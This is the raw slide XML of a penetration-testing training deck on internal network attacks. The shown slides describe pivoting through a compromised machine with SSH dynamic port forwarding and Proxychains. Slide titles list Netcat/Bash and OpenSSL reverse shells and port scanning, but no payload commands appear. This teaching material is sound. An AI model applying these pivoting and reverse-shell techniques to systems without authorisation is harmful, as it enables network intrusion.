        <p:spPr>
          <a:xfrm>
            <a:off x="673754" y="2160590"/>
            <a:ext cx="3973943" cy="4223432"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Using the initial access machine as a proxy server with Proxychains. Exposing the internal network using SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>dynamic port forwarding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (-D).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SOCKS tunnels use the SOCKS protocol which supports TCP/UDP use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Using this technique, we can use our own tools but always favour LOTL (More detail on this in later talks)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>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FC54B6D6-B245-475F-A421-426D63D8E7CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1604" r="26484" b="-2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5616311" y="827120"/>
            <a:ext cx="6215654" cy="5056444"/>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5971685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D5B27A2-99D4-4A43-94C9-01F3607B875F}"/>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Configuring SOCKS on SSH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63A1B233-3632-4E45-88FA-312BA801A411}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Install/Configure Proxychains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Start SSH tunnel with dynamic port forwarding (-D)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Route all traffic to internal network using Proxychains.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4260502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B27A2-99D4-4A43-94C9-01F3607B875F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Configuring SOCKS on SSH: Install Proxychains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A751F8AC-04DB-45E1-813F-D1596D1010ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="489106" y="2022748"/>
            <a:ext cx="6273919" cy="3463654"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A58CD7E-CD7F-4014-A742-7B9F1D877CCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3693112" y="2201662"/>
            <a:ext cx="3915051" cy="479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2D09214-D7F3-4F38-BB26-F8CAE95342A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7705817" y="2601157"/>
            <a:ext cx="1908700" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Available via mainstream package managers or install via source.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2068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863</TotalTime>
  <Words>2210</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>187</Paragraphs>
  <Slides>35</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Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Facet</vt:lpstr>
      <vt:lpstr>Introduction to Internal Network Penetration Testing - Offensive Security Tactics for Linux Professionals</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Internal Network Penetration Testing Methodology</vt:lpstr>
      <vt:lpstr>Purpose and Context of Internal Network Penetration Testing</vt:lpstr>
      <vt:lpstr>Business/Technical Considerations Against Enterprise Networks</vt:lpstr>
      <vt:lpstr>Establish Access via SOCKS/Reverse Shell </vt:lpstr>
      <vt:lpstr>Establish Access via SOCKS Tunnel</vt:lpstr>
      <vt:lpstr>Configuring SOCKS on SSH</vt:lpstr>
      <vt:lpstr>Configuring SOCKS on SSH: Install Proxychains</vt:lpstr>
      <vt:lpstr>Configuring SOCKS on SSH: Configure Proxychains</vt:lpstr>
      <vt:lpstr>Configuring SOCKS on SSH: Configure Proxychains</vt:lpstr>
      <vt:lpstr>Configuring SOCKS on SSH: Configure Proxychains</vt:lpstr>
      <vt:lpstr>Configuring SOCKS on SSH: Test Proxychains</vt:lpstr>
      <vt:lpstr>Configuring SOCKS on Firefox</vt:lpstr>
      <vt:lpstr>Introduction to Reverse Shells</vt:lpstr>
      <vt:lpstr>Adding SSH Reverse Shell Access</vt:lpstr>
      <vt:lpstr>Defensive SSH Tactics</vt:lpstr>
      <vt:lpstr>SSH Reverse Shell in Action</vt:lpstr>
      <vt:lpstr>SSH Reverse Shells for WAN (Wide Area Networks)</vt:lpstr>
      <vt:lpstr>Other methods of Reverse Shell</vt:lpstr>
      <vt:lpstr>Netcat/Bash reverse shell</vt:lpstr>
      <vt:lpstr>Bash payload explanation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The result of all this…</vt:lpstr>
      <vt:lpstr>Encrypted Reverse Shells using OpenSSL/mkfifo</vt:lpstr>
      <vt:lpstr>Encrypted Reverse Shells using OpenSSL/mkfifo</vt:lpstr>
      <vt:lpstr>Encrypted Communications!</vt:lpstr>
      <vt:lpstr>Host Discovery</vt:lpstr>
      <vt:lpstr>How to port scan internally?</vt:lpstr>
      <vt:lpstr>Port scanning: NMAP/Proxychains</vt:lpstr>
      <vt:lpstr>Port scanning: Living Off The Land</vt:lpstr>
      <vt:lpstr>Overview of recon/exploitation ratio</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
      <vt:lpstr>Thank you and see you all next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Internal Network Port Scanning &amp; Recon Tactics</dc:title>
  <dc:creator>Aqeeb Hussain</dc:creator>
  <cp:lastModifiedBy>HUSSAIN, AQEEB R.</cp:lastModifiedBy>
  <cp:revision>1347</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-03T15:50:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-07T14:04:56Z</dcterms:modified>
</cp:coreProperties>
</file>